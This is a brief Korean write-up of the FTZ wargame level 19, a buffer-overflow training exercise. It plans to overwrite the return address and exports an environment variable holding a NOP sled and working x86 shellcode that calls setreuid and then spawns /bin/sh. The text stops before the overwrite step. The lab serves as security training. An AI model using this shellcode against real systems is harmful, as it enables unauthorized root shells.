ftz 19

buf가 ebp-40이니 여기 채우고 SFP[4]채우고 RET[4]을 덮어쓰자.

우선 쉘을 실행시키는 환경변수를 만들자.

 

[level19@ftz level19]$ export SHELL=$(python -c 'print "\x90"*100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"')